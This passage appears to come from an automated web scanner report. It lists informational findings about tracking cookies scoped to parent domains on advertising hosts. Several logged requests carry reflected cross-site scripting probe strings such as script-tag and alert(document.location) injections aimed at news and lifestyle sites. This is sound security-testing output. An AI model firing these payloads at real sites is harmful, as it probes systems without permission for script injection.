Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: xltl=eJxdjrEKAjEQBf8lfSC72d1kYyUqeI2FYi3J7QWsxUr8d%252BOBjd0r5jFTC5XXo8TirtPebcbC4gJwNiHJ2IO0njVhCzhrTqxMpis3Htvj72G9AoBEpQxL1LkrsSYRqxZ4wfblAIp73u12wUDnwyoDLg44BiUAlKSA4Z%252BcTrtVIsW1OCLY2At39BR69lVR%252FdwEWzab6zLS3h8RnDXh; BFF=eJydkL0SwiAQhN%252BFJ%252BAgCQEafxqZUSzCODGNk9LaUvPugkG8ZMQZ0963t3e7vQJQ95sCqogDWtiVlJIRfVVQiVp7wBU5HK3b7c%252BXk2mMI7r37OdOGefYBmv5F9BlTLqcdmLixQ2jhbHbB4VAy5HWNK59KAYsgfmOSGRmFO636NcXiL%252B2OS3HAEaw3mCXkKJ6AzSbqnkiw5JKl%252FaXrynbyF%252FxBRWZqIEMT9BzoOo%253D; TFF=eJydkj0OgzAMRu%252FCCWxDcDALx%252BiagaFSt3ZD3L1p8yMaEsl0QEmk98j3yXFCKNtTkKRDGBZCWKZpom52QrLdBWf%252FjWz9Amm7n3j88H3B0xyOR4%252BzpjP8CsMPycCRNOd%252Fr7f14V5r1zC41cJcbG3%252Ba22UrcNN5BXoSZ3swJsLyaKmnQcV8xgtRJJamQzWOnw9SNszX3bI92Dhcda0Rpoj1OdeTXbg1fdw1q4mI1tLFl5y5G2Fx9bLp8LjrOmM%252FQ1RoAzW; EVX=eJw9ybENgDAMBMBdMoHfYGK%252Fh7FSpqZE2R2lgO6kGwSfyYiwHNRtyZtwNlzdq5fKWXJoWaHlJP51%252BdZQsnetFzSwFF4%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJyVkz0OgzAMRu%252FCCWwDcTALx%252BjKwFCpW7sh7t7wkwAmrcyAEtB7sa0v9EIo41uQpECoOkLomqahou2FZHwKtuFx7MMCcTtdeJz5UvHUrq9Hj5NmM8IK1YlkdBtJkZw%252FrWcPj%252BHVf4bCaKQp6tzUq%252FeHR2sdTtqdzigoUJI5jwNf38hj06x5kMrDedAz6J5qzM2weBC3V17PkOqg8jhpViPmCNnc850deHMdTtrdzshnbyTwzvsMr2%252Fkwp%252Bz8af%252F0Osb%252BcOYvpgADJg%253D; expires=Tue, 10-Jan-2012 13:06:07 GMT; path=/; domain=.exelator.com
Location: http://dts1.raasnet.com/dts/exelate/in?segments=&t=i
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Server: HTTP server


10.31. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s72097517517395

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s72097517517395?AQB=1&ndh=1&t=12/8/2011%2012%3A48%3A50%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//drupal.org/cases&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:20 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 12:49:20 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:49:20 GMT
Last-Modified: Tue, 13 Sep 2011 12:49:20 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFD0-5DB6-4F3F9D04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.32. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s83483789157502

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s83483789157502?AQB=1&ndh=1&t=12/8/2011%2013%3A8%3A42%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/%3F4324a%2527-alert%28document.location%29-%25272befc103ff4%3D1&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/?4324a%27-alert(document.location)-%272befc103ff4=1
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|273701C005159759-60000176201D1B1E|4E6E037C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:08:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:08:24 GMT
Last-Modified: Tue, 13 Sep 2011 13:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0448-1517-3C548CC2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www637
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.33. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s86790688387118

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s86790688387118?AQB=1&ndh=1&t=12/8/2011%2013%3A4%3A21%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//savannahnow.com/&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:04:04 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:04:04 GMT
Last-Modified: Tue, 13 Sep 2011 13:04:04 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0344-65FF-06BA6CCE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www427
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.34. http://p.raasnet.com/partners/dfp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/dfp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/dfp?partner=40046&ord=0.5825194382847674 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Content-Type: text/javascript
Content-Length: 21
Date: Mon, 12 Sep 2011 13:05:33 GMT
Connection: close

rasegs='rasegs=seg2';

10.35. http://p.raasnet.com/partners/oxmap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/oxmap

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/oxmap?external_user_id=8ceb81a1-f08d-353c-163f-89b1b78ecd62 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.36. http://p.raasnet.com/partners/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/pixel

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/pixel?t=gcm&id=CAESEKhDLfTHbxj77UOiLKpphxM&cver=1 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=155198643408292; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1784c8199cfe69ffd2e65a19; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.37. http://p.raasnet.com/partners/universal/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/universal/in

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:06 GMT;
Content-Type: text/html
Content-Length: 207
Date: Mon, 12 Sep 2011 13:06:06 GMT
Connection: close

<img border='0' width='1' height='1' src='http://p.raasnet.com/partners/exelate'/><img border='0' width='1' height='1' src='http://rd.rlcdn.com/rd?site=43881&type=redir&url=http://dts1.raasnet.com/dts
...[SNIP]...

10.38. http://pixel.quantserve.com/api/segments.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-573scDfDoUH6o&callback=qcCallback HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EIIBIQHYB4HRBprRW9iB4QschAEA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EH0BGgHYB7vR0b2IHh2EsRA; expires=Sun, 11-Dec-2011 13:07:51 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Mon, 12 Sep 2011 13:17:51 GMT
Content-Length: 39
Date: Mon, 12 Sep 2011 13:07:51 GMT
Server: QS

qcCallback({"segments":[{"id":"D"}]});

10.39. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=403227748;fpan=1;fpa=P0-1895254174-1315850535699;ns=0;url=http%3A%2F%2Fwww.popsugar.com%2Fajaxharness1274b%2522-alert(document.location)-%2522faa5baba69b%3Fharness_requests%3D%257B%2522replacements%2522%253A%2520%255B%257B%2522sugar-menu-subnav-items%2522%253A%2520%2522%252Fsugar-subnav-items%253Ffastcache%253D1%2526fg_locale%253D0%2522%257D%252C%2520%257B%2522user-feedback-div%2522%253A%2520%2522%252Fsugar-user-feedback-form%253Fissue%253Dinfinite%252520scroll%2522%257D%255D%252C%2520%2522callbacks%2522%253A%2520%255B%255D%257D;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=site_name.PopSugar;dst=1;et=1315850535698;tzo=300;a=p-36POJYHTosuxU HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EAkBHwHXB4GxBprRW9iBACyEAQA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EMMBGAHYB7vR0b2IENhCEA; expires=Sun, 11-Dec-2011 13:01:57 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 12 Sep 2011 13:01:57 GMT
Server: QS


10.40. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=6432&rnd1315831249 HTTP/1.1
Host: pixel.rubiconproject.com
